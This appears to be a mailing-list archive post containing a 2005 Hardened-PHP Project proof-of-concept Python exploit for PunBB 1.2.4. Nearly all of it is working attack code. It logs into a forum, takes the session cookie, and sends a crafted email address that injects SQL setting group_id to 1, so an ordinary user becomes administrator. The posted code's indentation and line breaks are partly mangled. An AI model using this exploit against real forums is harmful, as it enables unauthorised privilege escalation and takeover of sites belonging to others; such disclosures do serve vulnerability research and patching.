<<< Date Index >>>     <<< Thread Index >>>

PunBB <= 1.2.4 - change email to become admin exploit



#!/usr/bin/python
#######################################################################
# _ _ _ _ ___ _ _ ___ # | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/
# |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| # ####################################################################### # Proof of concept code from the Hardened-PHP Project #######################################################################
#
#                           -= PunBB 1.2.4 =-
#                   change_email SQL injection exploit
#
#  user-supplied data within the database is still user-supplied data
#
#######################################################################

import urllib
import getopt
import sys
import string

__argv__ = sys.argv

def banner():
   print "PunBB 1.2.4 - change_email SQL injection exploit"
   print "Copyright (C) 2005 Hardened-PHP Project\n"

def usage():
   banner()
   print "Usage:\n"
   print "   $ ./punbb_change_email.py [options]\n"
   print "        -h http_url   url of the punBB forum to exploit"
   print "                      f.e. http://www.forum.net/punBB/";
   print "        -u username   punBB forum useraccount"
   print "        -p password   punBB forum userpassword"
   print "        -e email      email address where the admin leve activation email 
is sent"
   print "        -d domain     catch all domain to catch \"some-SQL-Query\"@domain 
emails"
   print ""
   sys.exit(-1)

def main():
   try:
       opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:")
   except getopt.GetoptError:
       usage()

   if len(__argv__) < 10:
       usage()
username = None
   password = None
   email = None
   domain = None
   host = None
   for o, arg in opts:
       if o == "-h":
            host = arg
       if o == "-u":
           username = arg
       if o == "-p":
           password = arg
       if o == "-e":
           email = arg
       if o == "-d":
           domain = arg
# Printout banner
   banner()
# Check if everything we need is there
   if host == None:
       print "[-] need a host to connect to"
        sys.exit(-1)
   if username == None:
       print "[-] username needed to continue"
       sys.exit(-1)
   if password == None:
       print "[-] password needed to continue"
       sys.exit(-1)
   if email == None:
       print "[-] email address needed to continue"
       sys.exit(-1)
   if domain == None:
       print "[-] catch all domain needed to continue"
        sys.exit(-1)
        
   # Retrive cookie
   params = {
       'req_username' : username,
        'req_password' : password,
        'form_sent' : 1
   }
wclient = urllib.URLopener() print "[+] Connecting to retrieve cookie" req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params))
   info = req.info()
   if 'set-cookie' not in info:
       print "[-] Unable to retrieve cookie... something is wrong"
       sys.exit(-3)
   cookie = info['set-cookie']
   cookie = cookie[:string.find(cookie, ';')]
   print "[+] Cookie found - extracting user_id"
   user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, 
"%22%3B")]
   print "[+] User-ID: %d" % (int(user_id))
   wclient.addheader('Cookie', cookie);
email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\','
   append = 'group_id=\'1'
   email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + 
domain
params = {
       'req_new_email' : email,
        'form_sent' : 1
   }

print "[+] Connecting to request change email" req = wclient.open(host + "profile.php?action=change_email&id=" + user_id, urllib.urlencode(params))
   print "[+] Done... Now wait for the email. Log into punBB, go to the link in the 
email and become admin"

if __name__ == "__main__":
   main()